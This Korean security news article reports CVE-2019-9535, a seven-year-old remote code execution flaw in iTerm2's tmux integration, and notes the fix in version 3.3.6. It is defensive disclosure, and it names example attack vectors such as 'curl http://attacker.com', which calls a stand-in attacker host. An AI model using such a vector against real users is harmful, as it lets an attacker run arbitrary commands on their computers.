사이버 보안 회사인 ROS(Raically Open Security) 보안 전문가가 GPL 라이센스 iTerm2 macOS 터미널 에뮬레이터 앱에서 7년 된 중요한 원격 코드 실행 취약점을 발견했다.
iTerm2 macOS 터미널 에뮬레이터 앱은 맥의 내장 터미널 앱을 대체하는 오픈소스 대체 중 하나이다. CVE-2019-9535로 추적된 RCE 결함은 모질라 오픈소스 지원 프로그램(MOSS, Mozilla Open Source Support)의 지원을 받는 독립적인 보안 감사의 일부로 발견되었다.
모질라는 보안 권고문을 통해 “MOSS가 지원하는 보안 감사는 널리 사용되는 macOS 터미널 에뮬레이터 iTerm2에서 중요한 보안 취약점을 발견했다. ROS는 iTerm2의 tmux 통합 기능에서 중요한 취약점을 발견했고 해당 결함은 7년 이상 iTerm2에 존재해왔다. 대부분의 경우 터미널로 출력을 생성할 수 있는 공격자는 사용자 컴퓨터에서 명령을 실행할 수 있다.“고 설명했다.
원격 코드 실행 취약점은 iTerm2의 tmux 통합 기능에 존재하고, 공격자는 악성 출력을 터미널에 제공하여 임의 명령을 실행하는데 악용할 수 있다.
전문가는 이에 대한 PoC 비디오를 공개했다. 가능한 공격 벡터는 공격자가 제어하는 ssh 서버 또는 curl http://attacker.com과 tail -f /var/log/apache2/referer_log와 같은 명령어이다.
모질라는 “일반적으로 이 취약점은 어느 정도의 사용자 상호작용이나 속임수가 필요하다. 그러나 안전하다고 간주하는 명령을 통해 악용 가능하기 때문에 잠재적 영향력에 대한 우려가 있다.”고 말했다.
사용자는 iTerms2 버전 3.3.6 업데이트를 통해 이전 버전에 영향을 미치는 결함을 해결할 수 있다.
[PASCON 2019 개최]
·하반기 최대 정보보안/개인정보보호 컨퍼런스 PASCON 2019
·7시간 보안교육 이수 및 2020년 대비 보안실무 교육
·공공,기업 개인정보보호 및 정보보안 실무자라면 누구나 무료 참석
-무료사전등록: 클릭
★정보보안 대표 미디어 데일리시큐!★